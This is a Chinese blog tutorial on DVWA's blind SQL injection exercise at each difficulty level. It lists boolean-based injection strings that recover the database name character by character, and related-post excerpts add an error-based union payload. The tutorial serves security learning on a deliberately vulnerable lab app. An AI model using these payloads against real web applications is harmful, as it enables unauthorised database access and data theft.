DVWA的使用4–SQL Injection(Blind)(SQL盲注)

最新推荐文章于 2024-06-23 12:56:15 发布
最新推荐文章于 2024-06-23 12:56:15 发布
阅读量2.8k 收藏 10
点赞数 1
分类专栏: 漏洞 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjw0411/article/details/79714645
版权
DVWA的使用4–SQL Injection(Blind)(SQL盲注)

SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。

1).low级别

源码:
这里写图片描述
对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,查询结果只有 “User ID exists in the database.” 和 “User ID is MISSING from the database.”
漏洞利用:
判断是否存在注入,是字符型还是数字型:
这里写图片描述
这里写图片描述
判断出是字符型注入
数据库名长度:
这里写图片描述
输入1’ and length(database())=1#,显示User ID is MISSING from the database.
输入1’ and length(database())=2#,显示User ID is MISSING from the database.
输入1’ and length(database())=3#,显示User ID is MISSING from the database.
输入1’ and length(database())=4#,显示User ID exists in the database.
说明数据库名长度为4.
数据库名:
输入1’ and ascii(substr(database(),1,1))>97#,显示User ID exists in the database.,说明第一个字符的ascii值大于97(a)
输入1’ and ascii(substr(database(),1,1))<122#,显示User ID exists in the database.,说明第一个字符的ascii值小于122(z)
输入1’ and ascii(substr(database(),1,1))<110#,显示User ID exists in the database.,说明第一个字符的ascii值小于110(n)
输入1’ and ascii(substr(database(),1,1))<104#,显示User ID exists in the database.,说明第一个字符的ascii值小于104(h)
输入1’ and ascii(substr(database(),1,1))<100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不小于100(d)
输入1’ and ascii(substr(database(),1,1))>100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不大于100(d)
输入1’ and ascii(substr(database(),1,1))=100#,显示User ID exists in the database.
,说明第一个字符的ascii值等于100(d)
根据上述二分法最终得到数据库名为dvwa。
其他数据可同样根据上述方法进行得到。

2).medium级别

源码:
这里写图片描述
可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号进行转义,设置成下拉选择表单,控制输入。
漏洞利用:通过抓包修改参数id,构造查询函数。
这里写图片描述
这里写图片描述
这里写图片描述
这里写图片描述

3).high级别

源码:
这里写图片描述
High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果。
漏洞利用:
抓包时更改参数id=1’ and 1=1#。
这里写图片描述
结果:
这里写图片描述

id=1’ and 1=2#
这里写图片描述
结果:
这里写图片描述

4).impossible级别

源码:
这里写图片描述
采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

更多dvwa的使用及漏洞利用:https://blog.csdn.net/zjw0411/article/category/7542496

StoriesWine
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1450
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA笔记(7)--Blind SQL Injection(SQL盲注)
xiaopan233的博客
03-03 900
首先我们先了解一下SQL中基本的函数。 字符串截取类型: mid(str,num1,num2) 从指定位数开始截取字符串 第一个参数是字符串 第二个参数是从字符串的第几位开始截取 第二个参数是一共截取几个字符 如: select mid(‘hello’,1,2) 将会输出he。 substr(str,num1,nu...
DVWA 靶场 SQL Injection (Blind) 通关解析
最新发布
Flag少侠的博客
06-23 7613
SQL 注入(SQL Injection)是一种通过将恶意 SQL 代码注入到应用程序的输入中,以操纵数据库执行攻击者指定的操作的攻击方式。盲注(Blind SQL Injection)是 SQL 注入的一种特殊形式,攻击者无法直接获取数据库的错误消息或查询结果,只能通过观察应用程序的行为变化来推断数据库的响应。以下是对盲注的详细介绍,包括其原理、常见技术、攻击手法、防御措施以及实例分析。一、盲注的原理在盲注攻击中,攻击者无法直接看到数据库的查询结果,而是通过间接方法推断数据库的响应。
dvwaSQL Injection(Blind) 盲注
qq_17762247的博客
06-08 531
一、简介 SQL Injection(Blind),即SQL盲注,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路:手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。盲注
DVWA —— SQL Injection (Blind) SQL 盲注
YouTheFreedom的博客
05-24 258
SQL 注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回内容的变化来判断是否存在 SQL 注入和利用的方式。盲注的手段有三种
DVWA下的SQL Injection(Blind)
07-25
盲注
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL InjectionSQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
SQL盲注medium.pdf
05-13
本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入
Senimo
03-22 1216
DVWA平台的使用Vulnerability: SQL Injection Blind手工注入LowMediumHighImpossible Low 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先判断原语句的闭合方式,当输入1'时,提示该用户不在数据库中: 可判断原SQL语句闭合方式为id=...
dvwa第二题:SQL Injection(Blind)
yuqangy的专栏
02-08 650
---level: low--- 1.采用bool法(猜具体数据采用二分法) -- table count http://192.168.43.140/vulnerabilities/sqli_blind/?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_...
DVWA------SQL Injection (Blind)(SQL盲注
m0_65712192的博客
12-09 2777
DVWA------SQL Injection (Blind)(SQL盲注
dvwaSQL盲注
ANDTM的博客
05-30 982
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注
DVWA平台的使用Vulnerability: SQL Injection手工注入
Senimo
03-21 3197
DVWA平台的使用Vulnerability: SQL Injection注入LOWMediumHighImpossible LOW 此安全级别完全脆弱,根本没有任何安全措施。它的用途是作为网络应用程序漏洞如何通过不良编码实践表现出来的示例,并用作教授或学习基本利用技术的平台。 首先是一个输入框,需要输入User ID的值,尝试输入1: 可以得到正常的回显,包含First name和Surna...
DVWASQL注入(盲注
天空之蓝的博客
11-17 2781
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
dvwa靶场SQL Injection (Blind)(sql盲注)全难度教程(附代码分析)
m0_73248913的博客
04-05 580
dvwa sql盲注
DVWA通过攻略之SQL注入
勿山几已
05-24 8556
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
dvwa sql injection (blind)
03-16
DVWA SQL注入(盲注)是一种攻击技术,利用应用程序中的漏洞,通过注入恶意代码来获取敏感数据或者控制应用程序。在盲注中,攻击者无法直接获取数据库中的数据,而是通过不断尝试不同的注入语句,观察应用程序的反应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值